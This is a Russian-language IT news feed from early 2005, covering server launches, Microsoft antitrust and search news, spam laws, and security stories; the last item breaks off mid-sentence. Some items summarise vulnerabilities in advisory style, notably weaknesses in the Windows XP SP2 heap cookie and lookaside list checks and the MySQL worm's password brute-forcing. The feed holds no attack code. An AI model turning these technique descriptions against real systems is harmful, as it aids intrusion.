Корпорация IBM объявила о предстоящем выпуске нового недорогого сервера на базе процессоров IBM Power5, работающего под управлением операционной системы Linux. Новый высокопроизводительный сервер IBM eServer OpenPower 710 - это основанная на Linux альтернатива системам начального уровня HP и Sun на основе UNIX и Linux, помогающая клиентам повысить продуктивность бизнеса и снизить затраты. Сервер IBM eServer OpenPower 710 - это одно- или двухпроцессорная система для монтажа в стойку, поддерживающая операционные системы Linux в версиях Red Hat и SUSE. Система оптимизирована для достижения максимальной производительности в среде Linux и имеет многие функции систем более высокого уровня, такие как 64-разрядная архитектура IBM Power Architecture, а также (в качестве опции) заимствованные из мира мэйнфреймов средства виртуализации и поддержки микроразделов, свойственные только платформе Power5. Корпорация IBM также представила ряд отраслевых решений, оптимизированных для платформы OpenPower, которые пополнили растущий портфель решений для Linux on POWER от IBM. Всего за четыре месяца с момента появления систем OpenPower независимые поставщики программного обеспечения и разработчики для Linux оптимизировали для платформы OpenPower еще 250 приложений. Таким образом, общее число сертифицированных приложений превысило 900.
CNews

1/02/2005 14:09 Компания Inventa устранила дыру в Red Hat Enterprise Linux 3
Сотрудник российской компании "Инвента" обнаружил опасную дыру в Red Hat Enterprise Linux 3. Компания Red Hat признала, что обнаруженная ошибка переполнения буфера, находящегося в "куче", позволяет атакующему сконструировать файл, который приводит к аварийному завершению основной программы просмотра файлов less. Она могла быть использована для выполнения произвольного кода. Впрочем, в Red Hat считают, что технология exec-shield помешает успешной эксплуатации этой уязвимости на платформе x86. Эта технология включена по умолчанию в Red Hat Enterprise Linux, начиная с update 3. Ошибка была найдена 19 января. Red Hat был проинформирован в тот же день через открытую систему документирования ошибок Bugzilla. 20 января ошибку уже признали серьезной, а ещё через день сотрудник российской компании "Инвента" Виктор Ашик вопользовался открытостью исходных текстов Red Hat Enterprise Linux 3 и предложил патч, устраняющий ошибку. 26 января компания Red Hat оповестила о наличии уязвимости и распространила обновленный пакет программы less с устраненной ошибкой.
Подробности

1/02/2005 13:34 Выход официального релиза Solaris 10
Итак, официальный релиз новой версии ОС Solaris версии 10 выложен на официальном сайте Sun Microsystems. Желающие могут его свободно загрузить с сайта компании. Имеются версии для SPARC и x86 - платформ. Особенности системы: технология Solaris Containers, утилита DTrace, файловая система ZFS (zettabyte file system), возможность запускать приложения Linux.
Страница загрузки

1/02/2005 13:02 Microsoft запретили преуменьшать достоинства Windows
Корпорация Microsoft согласилась изменить название урезанной версии ОС Windows, предназначенной для европейского рынка, сообщает MSNBC. Это решение было принято, после того как Еврокомиссия выступила против наименования Windows XP Reduced Media Edition. По словам представителя компании, в настоящее время продолжаются консультации по подбору приемлемого альтернативного названия. По мнению Еврокомиссии, Microsoft нарушила предписание, согласно которому компания "должна воздержаться от использования коммерческих, технических и юридических терминов", которые снизили бы привлекательность для потребителей урезанной версии Windows. По требованию европейских законодателей Microsoft согласилась изъять свой мультимедийный плеер из версий операционной системы, поставляемых на европейский рынок. Для этого была выпущена альтернативная версия Windows, которая готова к поступлению в продажу, несмотря на то, что данное дело до сих пор находится в стадии обжалования. Еврокомиссия обвинила Micrisoft в использовании своего монопольного положения в области производств программного обеспечения для получения незаконного конкурентного преимущества. Согласно решению Евросоюза, корпорация должна изменить методы ведения бизнеса в Европе, а, кроме того, уплатить 651 миллион долларов штрафа за нарушение антимонопольного законодательства. Во вторник глава Microsoft Билл Гейтс должен посетить штаб-квартиру Евросоюза и провести переговоры с рядом высокопоставленных чиновников. Однако он не планирует встречаться с руководителем антимонопольного управления, который принял решение о наложении штрафных санкций на компанию.
Lenta.Ru

1/02/2005 12:50 Microsoft обзавелась собственной поисковой машиной
В понедельник Microsoft заменила поисковую технологию Yahoo собственным ПО и начинает гигантскую рекламную кампанию по вытеснению Google из потребительских сердец. Отделение софтверного гиганта MSN перенесло свою технологию веб-поиска из лаборатории на модернизированную веб-страницу для 25 стран. После двух с половиной лет работы над MSN Search эта машина становится ядром обновленного и облегченного сайта; а также предметом рекламной кампании Microsoft, охватывающей телевидение, печать, интернет и внешнюю рекламу. Вице-президент MSN Search Кристофер Пейн отказался назвать стоимость рекламной кампании, но сказал, что 90% затрат приходится на Америку, хотя коснется она и граждан Великобритании и Японии. Например, телевизионная реклама будет передаваться во время игр Super Bowl, церемонии «Оскар» и церемонии Grammys. «Вы обязательно ее увидите», — заверил Пейн. С рекламной кампании и нового сайта Microsoft начинает разминать свои мощные маркетинговые мускулы, вступая в борьбу за симпатии пользователей веб-поиска и рекламодателей с действующим чемпионом — Google. Хотя Google последние пять лет набирала силу, с выходом на этот рынок Yahoo и других ее господство в сфере поиска начинает ослабевать. Теперь, когда Microsoft запустила собственную технологию, софтверный гигант будет яростно бороться с конкурентами, пользуясь своим браузером Internet Explorer и доминированием на рабочем столе. Отношениям между MSN и конкурирующей Yahoo, скорее всего, наступит конец. Поисковая технология Yahoo Inktomi более трех лет лежала в основе MSN, а целенаправленную текстовую рекламу несколько лет обеспечивала ее дочерняя компания Overture Services. В ближайшие месяцы MSN будет продолжать лицензировать поисковую технологию Yahoo для своих корейского и японского сайтов. Пейн не стал говорить о планах замены Overture, но срок соглашения истекает в 2006 году. MSN уже усилила собственную активность в области продажи спонсируемых листингов.
ZDNet

31/01/2005 20:54 "Безопасность Linux — миф" - утверждает предствитель Microsoft
Nick McGrath из британского подразделения корпорации Microsoft, заявил, что все заявления и слухи о безопасности Linux являются сильно преувеличенными, да и сама идея опенсоурс потенциально уязвима. «Кто отвечает за безопасность Linux-ядра? Например, Red Hat несет ответственность? Нет, она не может, потому что не разрабатывает Linux-ядро. Она создает Linux-дистрибутив». В настоящее время, якобы, покупатели не столь охотно покупают Linux ввиду ее «неподготовленности» для критически важных вычислений. «Главная трудность, которую нам нужно преодолеть, — столкновение мифов и реальности. Существует множество мифов о том, на что способна Linux. Один из таких мифов, по нашему мнению, в том, что Linux безопаснее Windows. А другой — в том, что вирусов в Linux нет», — пояснил Nick McGrath. Судя по всему, корпорация Microsoft, устав заделывать бесчиленные уязвимости в своих ОС и приложениях (например, в "таких безопасных, каким являются Outlook и Internet Explorer" - по словам McGrath), решила заняться более лёгким (и привычным для мегакорпорации) занятием - поливанием грязью единственного конкурента, способного стать в последнее время достойным противовесом "сами_знаете_какой_операционной_системе".
Подробности

31/01/2005 17:58 Гейтс выступает за активизацию борьбы с киберпреступностью
Основатель американской корпорации Microsoft Билл Гейтс считает необходимым активизировать борьбу с преступностью в интернете. Об этом он заявил в понедельник в южногерманском Мюнхене (Бавария), где открылся конгресс, посвященный вопросам компьютерной безопасности. С точки зрения Билла Гейтса, передает «Прайм-Тасс», в последнее время ситуация в этой сфере существенно осложнилась. Многократно возросло количество нелегально распространяемых рекламных материалов, а также случаев взлома паролей и вторжения в компьютерные сети. Однако эти проблемы разрешимы, сказал он. Для того, чтобы эффективно противостоять этому виду преступности, считает Гейтс, нужно сделать ставку на технические инновации, а также объединение усилий фирм, работающих в сфере информационных технологий, и поддержку со стороны политиков.
"Вебпланета"

31/01/2005 17:25 AGAVA SpamProtexx – еще один инструмент против спама
Компания "Агава" объявила о появлении нового продукта - программы-антиспам AGAVA SpamProtexx. Это обучаемый фильтр, основанный на проверке содержания сообщений. AGAVA SpamProtexx одинаково быстро и эффективно взаимодействует со всеми почтовыми клиентами, не требуя их настройки. SpamProtexx в распознавании спама исходит именно из личных предпочтений пользователя. Фильтр анализирует предоставляемые примеры "спама" и "не-спама", формулирует для себя пользовательские критерии в алгоритмах сортировки, постоянно дорабатывает белый список. Корреспонденцию, признанную спамом, SpamProtexx не удаляет, а перемещает в отдельную папку. Содержимое папки можно проверить в любой удобный момент, не отвлекаясь поминутно на каждое пришедшее письмо. Это значительно сокращает временные издержки, связанные с обилием спам-почты, и исключает вероятность случайной утери важных писем. Механизм идентификации основан на Байесовском алгоритме. У программы отсутствует ограничение на число фильтруемых почтовых ящиков и есть возможность одновременной работы с любыми другими спам-фильтрами. SpamProtexx поддерживает протоколы POP3, IMAP и SMTP. Антиспам - программа автоматически определяет и поддерживает SSL-соединения по указанным протоколам.
О продукте

31/01/2005 17:16 Недельный отчет о вирусах Panda Software
Опубликован очередной еженедельный отчёт о вирусной активности от Panda Software. В отчете рассмотрены черви Crowt.A, Mydoom.AG, Cisum.A, Bagle.BK и Bagle.BL.
Отчёт

31/01/2005 16:30 Иммобилайзеры не устоят перед хакерами
Американские инженеры обнаружили способ взлома кода, используемого в миллионах автомобильных ключей. Подобная находка может позволить преступникам обходить системы безопасности на новейших моделях автомобилей. Осложняет ситуацию и то, что взломанная технология используется в системах бесконтактной оплаты товаров и услуг. Как сообщает AP, группа исследователей из университета Джона Хопкинса (Johns Hopkins University), которую финансирует компания RSA Securitу, заявила о том, что нашла способ взломать автомобильную противоугонную систему (иммобилайзер), разработанную на основе чипов компании Texas Instruments. По заявлению инженеров, взлом устройства считывания информации производится с помощью относительно недорого электронного прибора. Иммобилайзер (в переводе с английского «обездвиживатель») представляет собой противоугонную систему, не позволяющую запустить двигатель автомобиля до тех пор, пока не произойдёт авторизация водителя путём, например, поднесения ключа к считывателю кода. Радиочастотная противоугонная система, уязвимости в которой обнаружили американцы, используется в более чем 150 млн. современных автомобилей. Она состоит из преобразующего чипа, встроенного в ключ безопасности и приемника внутри машины. Если приемник не распознает сигнал от ключа, автомобиль не заведется, даже если вставить подлинный ключ зажигания. Похожим образом и на аналогичных микросхемах работает система бесконтактной оплаты товаров и услуг, применяемая на некоторых автозаправках в США. Приемник находится внутри бензоколонки и когда перед ней проводят небольшим жетоном со специальным кодом, он способен распознать сигнал от жетона. Стоимость горючего затем списывается со счета кредитной карты владельца жетона. Возглавляющий группу университетских исследователей Ави Рубин (Avi Rubin), профессор информатики, заявил, что, подобрав ключ безопасности, он уже смог украсть свою машину и заправить ее горючим на деньги, списанные со своей кредитки. Процесс взлома секретного кода был продемонстрирован специалистам компании Texas Instruments, но там считают, что применить его на практике очень сложно. «Оборудование, используемое для взлома, слишком громоздко, дорого и не практично для обычных преступников, — утверждает Тони Сабетти (Tony Sabetti), менеджер из Texas Instruments. — И поэтому в нашей компании уверены в высшей степени безопасности наших технологий для тех сфер, где они применяются». Билл Аллен (Bill Allen), представитель Texas Instruments, заявил, что за 7 лет использования данной технологии не было зафиксировано ни одного случая кражи автомашины или дублирования жетона для приобретения бензина. Однако, по мнению профессора Рубина, демонстрация системы взлома кодов, показывает, что разработчики не уделяют должного внимания безопасности: «Я думаю, что в результате этого недосмотра в вопросах защиты автомобилей от угона мы откинуты к тому состоянию, в котором находились 10 лет назад». В качестве превентивной меры исследователи советуют экранировать радиочастотные компоненты иммобилайзеров, когда они не используются, металлическими футлярами.
CNews

31/01/2005 16:14 SGI поставляет кластеры "под ключ"
У Silicon Graphics новая линейка продуктов: заранее сконфигурированные кластеры серверов Altix 350, адресуемые заказчикам со "средними" потребностями в вычислительной мощности. Серверы будут поставляться компанией в комплекте с сетевым оборудованием, системами хранения и ПО управления, необходимыми для построения кластеров. По выбору заказчика SGI может сопроводить поставляемое решение системой распределения нагрузки LSF разработки фирмы Platofrm Computing, ПО управления сетями компании Voltaire и оборудованием поддержки технологии межсоединений InfiniBand. Одновременно представители SGI анонсировали Altix Hybrid Cluster - решение, позволяющее создавать кластеры, в которых одновременно используются как серверы на основе 64-разрядных процессоров, так и 32-разрядные.
Источник

31/01/2005 15:59 Рассылка спама в Германии будет караться штрафом
Граждане Германии, уличенные в рассылке нежелательных рекламных сообщений, будут выплачивать штраф в размере 50000 евро (65190 долларов США), сообщает агентство Reuters. Соответствующий законопроект был предложен правящей коалицией страны - Социал-демократической партией во главе с Герхардом Шредером и партией "зеленых". Документ будет рассмотрен в первом чтении нижней палатой в начале марта. С июля прошлого года деятельность спамеров в Германии уже считалась незаконной, но ожидается, что новый законопроект обеспечит еще более эффективную защиту пользователей интернета от непрошенных рекламных писем. На сегодняшний день около 80% всех сообщений электронной почты составляет макулатурная реклама. По данным антивирусной компании Sophos, в 2004 году по объему рассылаемого спама лидировали США, Южная Корея и Китай. В спамерскую десятку, наряду с Францией и Великобританией, попала и Германия.
"Компьюлента"

31/01/2005 15:47 Gartner критикует антипиратский план Microsoft
По мнению аналитической фирмы Gartner, намерение Microsoft лишить пиратов доступа к исправлениям грозит усилением секьюрити-угроз. Программа Microsoft Windows Genuine Advantage (WGA), нацеленная на выявление пиратских копий Windows, только усугубит проблемы безопасности, с которыми сталкиваются предприятия, утверждает Gartner. Силясь истребить контрафактное ПО, Microsoft намерена потребовать от заказчиков доказательства подлинности их копий Windows, прежде чем позволить им загружать секьюрити-патчи. Компания тестирует инструмент, который проверяет, является ли данная версия Windows легальной, и с середины 2005 года этот процесс станет обязательным для загрузки обновлений и дополнительных инструментов для Windows во всех странах. Однако Gartner предупреждает системных администраторов, что программа WGA приведет к увеличению числа неисправленных Windows-систем и, следовательно, к усилению угрозы со стороны скомпрометированных ПК — особенно для компаний, которые не устанавливают патчи регулярно. Аналитики Gartner утверждают, что «программа WGA неизбежно приведет к увеличению числа непропатченных Windows-систем в интернете, так что вам необходимо совершенствовать свои процессы установки исправлений, чтобы защитить собственные системы от червей и других атак со стороны непропатченных систем». Начальник отдела безопасности и сервиса Frost & Sullivan Asia Pacific Нитин Ашарекар считает WGA правильным шагом со стороны Microsoft, так как в результате больше компаний станет пользоваться лицензионными исправленными копиями Windows. Угрозу же, о которой говорит Gartner, он считает, скорее, «теоретической», чем вероятной. «Множество скомпрометированных и зомбированных ПК существует уже сегодня — повсюду имеется масса нелегальных копий Windows, и мало кто из потребителей достаточно аккуратен, чтобы поддерживать безопасность своих компьютеров на должном уровне. Теоретически угроза может усилиться, но на практике я не думаю, что это произойдет, так как не многие потребители устанавливают исправления на свои компьютеры. Поэтому риск и так существует».
Подробности

30/01/2005 16:43 Уязвимости браузера Pocket IE
Довольно интересная статья об уязвимостях браузера Pocket IE, который встроен в ОС Windows Mobile на Pocket PC, выпущена компанией Airscanner Corp., которая известна подробным анализом троянов и червей, выпусщенных для Pocket PC. Браузер Pocket IE, в отличие от своего "старшего брата" обладает более узкими возможностями, что, естественно, ограничивает масштаб атак на этот браузер (например, абсолютно неприменима знаменитая атака IFRAME). Тем не менее и в нём обнаружены уязвимости, что ещё раз подтверждает "квалификацию" программистов M$. Первая уязвимость позволяет использовать UNICODE при формировании URL и, таким образом, обмануть пользователя при обращении к Вэб-сайту. Вторая связана с возможностью доступа к локальным файлов различных форматов (xls, htc & htp (in IE) и т.д.). И, наконец, третья уязвимость связана с возможностью с возможностью выполнения XSS-атаки с использованием тега <div>. В коонце атаки авторы приводят пример комбинирования описанных уязвимостей для проедения комплексной атаки на браузер.
Cтатья

30/01/2005 15:09 В четверг у «Каравана» произошел сбой
Работа более 300 интернет-ресурсов, хостинг которым предоставлен провайдером «Караван» были вчера отрезаны от интернета. Как сообщили «Транспортному серверу Москвы» в компании, «вчера по нашей вине была полностью парализована работа более 300 интернет-ресурсов. Ночью 28 января мы восстановили их работу, но по нашей вине все данные за 27 января были безвозвратно потеряны», — отметил представитель компании. Стоит отметить, что компания начала осуществлять свою деятельность в 1996 году в качестве dialup-провайдера. Даже спустя сутки после отключения сайтов компания даже не опубликовала на своем сайте извинения пользователям, а также описание проблемы произошедшей в минувший четверг, 27 января, укоряет «Транспортный сервер Москвы». В течение четверга молчала и техническая поддержка, ни один клиент не получил обоснованного ответа о том, что же произошло с их сайтами.
Источник

30/01/2005 14:46 BlowSearch Secured Messenger: IM-клиент с криптозащитой
Компания BlowSearch, изначально специализировавшаяся на продаже услуг метапоиска, открыла для себя рынок систем мгновенного обмена текстовыми сообщениями, предложив пользователям IM-клиент, снабженный развитыми средствами криптографической защиты от перехвата. Программа BlowSearch Secured Messenger снабжена встроенным модулем шифрования данных с разрядностью ключа от 56 до 256 и 4096 бит в зависимости от выбранного клиентом тарифного плана. Заплатив раз в квартал 2,95, 7,95 или 9,95 долларов, пользователь сможет подключиться к "бронзовому", "серебряному" или "золотому" плану, получив при этом возможность включения в интерфейс программы собственных контакт-листов из AOL AIM, ICQ, Yahoo Messenger и MSN Messenger. Существует и бесплатная версия клиента, также умеющая шифровать данные 56-битным ключом, но пользователю такой версии не предоставляются услуги бесплатной технической поддержки. Программа, как уже было сказано, умеет общаться с пользователями четырех крупнейших IM-сервисов, однако разговор, как пишет InfoWorld, может быть защищен только в том случае, если оба собеседника будут пользоваться BlowSearch Secured Messenger. Клиент работает на всех версиях Windows, но требует для себя наличие браузера MS Internet Explorer.
Internet.Ru

30/01/2005 14:09 Готовимся к фильтрации Рунета. Представляем инструменты
Разработчики Metric создали сайт Центра Анализа Интернет Ресурсов. ЦАИР специализируется на проектировании и распространении программного обеспечения для осуществления избирательного доступа пользователей к информационным ресурсам сети Интернет, cообщает internet.ru. Cair.ru, в первую очередь, ориентирован на ответственных сотрудников корпоративных, государственных и частных образовательных и воспитательных учреждений, а также организаций занимающихся организацией публичного доступа к ресурсам Интернет. "Наряду с очевидными преимуществами развития интернет-коммуникаций бесконтрольный доступ несет серьезные скрытые и открытые угрозы для детей и учащихся со стороны Интернета, это наркопропаганда, порнография, терроризм, экстремизм и сектантство. Кроме того, в многочисленных исследованиях признано фактическое снижение эффективности работы государственных, муниципальных и корпоративных служащих из-за использования Интернет в личных целях". Эта цитата из пресс-релиза как нельзя лучше ложится в контекст заявлений российских чиновников, призывающих навести порядок в Интернете. Центр Анализа Интернет Ресурсов предлагает консультации и собственные программы контентной фильтрации, которые обеспечивают эффективную защиту детей и учащихся от агрессивного интернет-контента в учебных заведениях и местах общественного доступа, а также повышают эффективности работы государственных, муниципальных и корпоративных служащих посредством управления их доступом к ресурсам Интернета. Кроме того, с их помощью осуществляется ведомственный и корпоративный мониторинг, анализ и управление доступом к ресурсам Интернет. Сайт содержит информацию о деятельности ЦАИР: его целях, задачах, структуре, сотрудниках, последних новостях, положении дел с информацией в Интернете, технологиях контентной фильтрации, предлагаемом программном обеспечении и многом другом. В ближайшем будущем на www.cair.ru будут размещены бесплатные версии программ для контекстной фильтрации. Также, через сайт будет осуществляться онлайн поддержка для наших клиентов.
Сайт проекта

30/01/2005 13:34 Последствия инициативы Sun для Linux
Появились первые отклики и попытки анализа последствий последних инициатив корпорации Sun Microsystems для open source сообщества вообща и для развития Linux в частности, cообщает linux.org.ru. Так например вице-президент IBM Bob Sutor полагает что согласно политике лицензирования Sun недавно якобы открытые 1600 патентов на самом деле будут доступны только пользователям OpenSolaris, но не Linux, поскольку CDDL и GPL содержат взаимоисключающие требования и не могут быть применены одновременно в рамках одной программы. Памела Джонс, штатный юрист портала groklaw.net, также полагает что с точки зрения GPL-сообщества инициатива Sun не несет никакой практической пользы, кроме вреда: "Sun is now competing with Linux. That's not the same as trying to kill it, but it's not altogether friendly either". Представители Gentoo придерживаются иной точки зрения. По их мнению Gentoo предоставляют лишь метаданные, содержащие инструкции по сборке и установке пакетов, что позволяет каждому отдельному пользователю в конечном итоге получить программу, сочетающую или нарушающую любую мыслимую комбинацию лицензий под свою личную ответственность. И, наконец, сам Scott McNealy рассказывает историю о том как его компания содействует миру во всем мире, защите opensource-разработчиков от террора патентного законодательства, преодолению IT-барьера в развивающихся странах и о том почему Solaris 10 являетс "лучшей ОС на планете с новейшими и величайшими возможностями".
Подробности

30/01/2005 12:52 США начнут испытания ID-чипов для иностранцев
31 июля Министерство внутренней безопасности США планирует начать выдачу специальных идентификационных устройств иностранным гостям, прибывающим в страну пешком или автотранспортом. Эти устройства будут содержать микрочипы с уникальным идентификационным кодом, по которому в компьютерах министерства легко найти документ с именем владельца, страной проживания, датами прибытия и отбытия и биометрическими данными. В рамках отдельной, но взаимосвязанной программы Госдепартамент экспериментирует с введением идентификационных устройств, или радиометок (RFID), в американские паспорта для борьбы с их кражами и подделкой. Правительство призывает к тому же другие страны.
ZDNet

30/01/2005 12:30 Владелец сайта Napster.no признан виновным в нарушении копирайта
Согласно решению Верховного суда Норвегии, владелец веб-сайта Napster.no должен выплатить компенсацию студиям звукозаписи за нарушение авторских прав, сообщает Associated Press. В 2001 году студент из Лиллехаммера запустил сайт Napster.no, не имевший никакого отношения к американскому онлайновому музыкальному сервису Napster. Юноша разместил на нем ссылки на 170 музыкальных файлов формата MP3, которые можно было скачивать бесплатно. Интернет-ресурс действовал всего четыре месяца. Однако этого хватило, чтобы звукозаписывающие компании Tono, Sony Music Entertainment Norway AS, Universal Music AS и некоторые другие подали против норвежца исковое заявление, обвиняя его в нарушении копирайта. Суд низшей инстанции, рассматривавший этот иск, оправдал студента. Судебный вердикт гласил, что закон об авторском праве нарушается, когда кто-либо вывешивает в интернете музыкальные файлы. Размещение же ссылок на них противозаконным не считается. Верховный суд, куда было передано дело, принял противоположное решение и признал юношу виновным в нарушении копирайта. Студент должен выплатить истцам сумму в размере 15900 долларов США в качестве возмещения ущерба.
"Компьюлента"

30/01/2005 12:07 RU-center регистрирует домены .com и .net
Региональный сетевой информационный центр RU-center, российский регистратор доменных имен, объявил о начале работы в качестве аккредитованного регистратора доменов .com и .net. В 2003 году RU-center был аккредитован ICANN в качестве регистратора доменов общего пользования и получил право работать непосредственно с операторами реестров .com, .net, .org., biz. и .info. А с декабря 2004 года RU-center работает напрямую с реестрами доменов .com и .net в соответствии с соглашением, подписанным в апреле 2004 года с компанией Verisign. Теперь не только упрощена процедура регистрации домена на заявителя, но и появилась возможность самостоятельного управления доменом через русскоязычный интерфейс. Информационный центр оформляет договор на регистрацию доменов и оказание услуг по их обслуживанию, а также бухгалтерские документы в соответствии с нормами национального законодательства.
Подробнее

30/01/2005 11:26 Юный создатель вируса Blaster отправляется в тюрьму на полтора года
В пятницу окружной суд Сиэтла назначил 19-летнему Джеффри Ли Парсону (Jeffrey Lee Parson) наказание в виде лишения свободы сроком на полтора года за создание и распространение варианта вируса-червя Blaster, сообщает Reuters. Ранее подросток признал себя виновным в распространении вируса-червя Blaster, заразившего в прошлом году более 48 тысяч компьютеров по всему миру и атаковавшего сервера корпорации Microsoft. Судья Марша Печман (Marsha Pechman) решила не применять к создателю вируса максимального наказания. Подростку грозило от 18 до 37 месяцев тюрьмы и штраф до нескольких сотен тысяч долларов. Однако судья пришла к выводу, что преступление Парсона отчасти обусловлено "дурным воспитанием и недостаточным наздором". В ходе судебных слушаний Парсон признался, что он создал "B", или "teekids" вариант вируса Blaster и использовал его для доступа к пятидесяти компьютерам, через которые червь поразил в дальнейшем более 48 тысяч компьютеров. Программный код вируса Blaster и его разновидностей позволяет ему самостоятельно размножаться и распространяться через "дыры" в защите операционной системы Windows, установленной на 90 процентах персональных компьютеров в мире.
Подробности

29/01/2005 15:49 Linux-стратегия Novell беспокоит некоторых заказчиков
Амбициозная стратегия Novell в отношении Linux вызывает у некоторых заказчиков беспокойство по поводу того, как бы компания не прекратила поддержку некоторых своих старых приложений. Выступив в четверг на конференции Linux Big Picture в Лондоне, руководители Novell рассказали новые подробности о системе Open Enterprise Server (OES) — будущем продукте, в котором операционная система NetWare сочетается с SuSE Linux Enterprise Server 9. В частности, директор по Linux-решениям европейского отделения Novell Брайан Грин сказал, что OES позволит заказчикам NetWare работать с приложениями для Linux, а заказчикам SuSE Linux — эксплуатировать службы NetWare на Linux. «Мы считаем, что SuSE Linux гарантирует стабильную, защищенную платформу для бизнес-приложений, — заявил Грин. — Работая над Novell Open Enterprise Server, мы берем сетевые службы, отделяем их от ядра и делаем доступными на Linux. Мы сделали доступными на Linux все службы, к которым вы привыкли в NetWare, — файловую систему, механизм печати и т. п.» OES планируется выпустить в середине февраля. Однако некоторые заказчики NetWare обеспокоены тем, что взяв на вооружение Linux и приложения open source, Novell в недалеком будущем может прекратить поддержку проприетарных приложений, дублирующих приложения open source. В частности, они опасаются, что такая участь может постичь GroupWise, систему электронной почты и коллективной работы Novell, которая обеспечивает ту же функциональность, что и альтернативы SuSE Linux Openexchange Server и Evolution.
ZDNet

29/01/2005 14:37 Формат Microsoft Word признан находкой для шпиона
Около 75 процентов электронных документов, находящихся в документообороте различных коммерческих компаний Запада, содержат информацию, которую сами компании считают не подлежащей разглашению, однако в 90 процентах этих компаний не знают, что такую информацию легко перехватить. Такие выводы, как сообщает BBC News, содержатся в исследовании фирмы Workshare, которая занимается вопросами компьютерной безопасности в корпоративных офисах. Одна из проблем ненадежности хранения, по мнению экспертов фирмы, связана с широким применением последних модификаций формата Microsoft Word, который способен сохранять различные версии фрагментов документа при его изменении. Часто при создании документов используются фрагменты не подлежащего распространению текста, который потом убирается, но может оставаться в скрытом виде. Квалифицированный специалист по безопасности или хакер может очень легко прочесть такую скрытую информацию, что может использоваться при промышленном шпионаже и в других неблаговидных целях, отмечают в Workshare. Отмечается, что сама Microsoft признает наличие проблемы и предлагает специальную программу "Remove Hidden Data" (rhdtool.exe), которая убирает из документов всю лишнюю информацию. Microsoft рекомендует обрабатывать этой программой каждый документ перед опубликованием его в публичных источниках.
Lenta.Ru

29/01/2005 13:35 За любовь к бесплатному интернету под следствием находятся более тысячи пензенских студентов и школьников
Отдел «К» УВД Пензенской области возбудил уголовное дело по признакам преступления, предусмотренного статьей 165 УК РФ («Причинение имущественного ущерба путем обмана или злоупотребления доверием»). Фигурантами этого дела являются более тысячи пензенских студентов и школьников, которые незаконно пользовались появившимися на городских чатах логином и паролем для доступа в интернет, принадлежащими торговой фирме «Сателлит». По предварительным подсчетам, убытки предпринимателей оцениваются в 500-800 тыс. рублей. Сейчас сотрудники отдела «К» продолжают работу по выявлению человека, предавшего широкой огласке секретные данные. В середине января руководство пензенской торговой фирмы «Сателлит» обратилось в отдел по борьбе с преступлениями в сфере IT-технологий, обратив внимание на небывало высокую сумму в собственных счетах от интернет-провайдера. После этого отдел «К» УВД Пензенской области возбудил уголовное дело по признакам преступления, предусмотренного статьей 165 УК РФ («Причинение имущественного ущерба путем обмана или злоупотребления доверием»). В ходе его оперативных мероприятий следователи получили в местном филиале ОАО «Волгателеком» сведения о том, с каких телефонных номеров осуществлялся выход в интернет с использованием логина и пароля, принадлежащих «Сателлиту». Оказалось, что возможностью бесплатного доступа в сеть воспользовались более тысячи студентов и школьников, взявших нужную информацию с общедоступных пензенских чатов и форумов. По сведениям, полученным в областном УВД, силовикам до сих пор не удалось выяснить, каким образом секретные логин и пароль, используемые сотрудниками «Сателлита», стали общедоступными. В отделе «К» имеющуюся информацию комментировать отказались, сославшись на тайну следствия, а представители «Сателлита» категорически отказываются давать какие-то разъяснения, ссылаясь на «запрет органов внутренних дел».
Подробности

29/01/2005 13:26 Эксплоит уязвимости Winamp
Rojodos из Испании сообщил о написании эксплоита уязвимости популярного медиа-плеера Winamp. Уязвимость обнаружена NSFOCUS Security Team и заключается в переполнении буфера в библиотеке in_cdda.dll при специальным образом сформированном запросе типа cda://. Присутствует в версиях до 5.08с.
Эксплоит

29/01/2005 12:51 Обход встроенных механизмов защиты от переполнения буфера в куче и технологии DEP в Windows XP SP2
Российская компания Positive Technologies сообщает о возможности обхода встроенных механизмов защиты от переполнения кучи и выполнения кода в области данных в Windows XP Service Pack 2. Несколько уязвимостей обнаружено в механизме проверки маркера ("cookie") введенного для определения целостности заголовка блока памяти:
1. Проверочный маркер проверяется только тогда, когда выделяется свободный блок, однако такая проверка не выполняется при его освобождении. В результате возможно изменить размер блока и поместить его в произвольный freelist.
2. При работе с lookaside списками не реализовано никаких проверок целостности заголовка - нет даже проверки достоверности значения проверочного маркера. В результате этого, теоретически, появляется возможность перезаписать до 1016 байт в любой области памяти.
Способов устранения обнаруженной уязвимости не существует в настоящее время. В качестве временного решения, компания Positive Technologies выпустила бесплатную утилиту, которая для определенных приложений устанавливает глобальный флаг, который будет запрещать использование ассоциативных списков.
Описание
Утилита

29/01/2005 12:20 DomainsDB.net теперь поддерживает зону .RU
Как сообщил нам один из посетителей, уникальный сервис Dominsdb.net для ИТ-специалистов и секьюрити-аналитиков теперь поддерживает зону .RU. Это значит, что сделав запрос http://domainsdb.net/uinc.ru Вы можете увидить, что на данном IP размещен еще один домен. Сервис поддерживает поиск по IP-адресам, доменам и днс серверам. Появилась статистика: TOP1000 мировых ДНС серверов по кол-ву расположенных на них доменах, топ стран, где размещены домены, топ 500 сетей пол кол-ву доменов и топ 500 ISP хостеров. В новом дизайне все смотрится очень красиво, появился форум для поддержки пользователей. Сервис абсолютно бесплатный, предназначен как для аналитиков, так и для рядовых пользователей сети.
Сервис

28/01/2005 13:11 Червь MySQL поражает Windows-системы
В системах баз данных начал распространяться червь, использующий неудачный выбор пароля администратором. Злокачественная программа, которую называют MySQL bot или, по имени исполняемого файла, SpoolCLL заражает компьютеры с операционной системой Microsoft Windows и базой данных open source MySQL. Об этом сообщила организация Internet Storm Center в своем предупреждении, опубликованном в четверг. Судя по предварительным оценкам, к настоящему моменту может быть заражено свыше 8000 компьютеров, утверждает эта группа, наблюдающая за угрозами в сети. Сначала червь получает доступ к базе данных, угадывая пароль системного администратора при помощи списка часто используемых паролей. Затем, воспользовавшись пробелом в защите MySQL, он исполняет так называемую бот-программу, которая полностью овладевает системой. «К боту прилагается длинный список паролей, и он взламывает систему методом грубой силы», — говорится в предупреждении Internet Storm Center. Тем, что она заражает Windows-системы, исполняющие ПО баз данных, программа напоминает червя Slammer, широко распространившегося почти два года назад. Однако, в отличие от Slammer, от червя SpoolCLL защищает надежный пароль. К тому же базы данных MySQL гораздо чаще устанавливаются с операционными системами open source, такими как Linux. Это означает, что бот MySQL способен поразить лишь небольшое число компьютеров, подключенных к интернету. Дефект, используемый червем для получения контроля над уязвимой системой, был обнаружен в середине 2004 года, а код, использующий этот дефект — опубликован в конце декабря. Уязвимость, известная как MySQL UDF Dynamic Libray, вызвана тем, что программное обеспечение базы данных не производит адекватной проверки определяемых пользователем функций (UDF). Исправлена ли эта ошибка, не известно. Компьютеры, зараженные червем, пытаются подключиться к одному из нескольких серверов Internet Relay Chat, чтобы 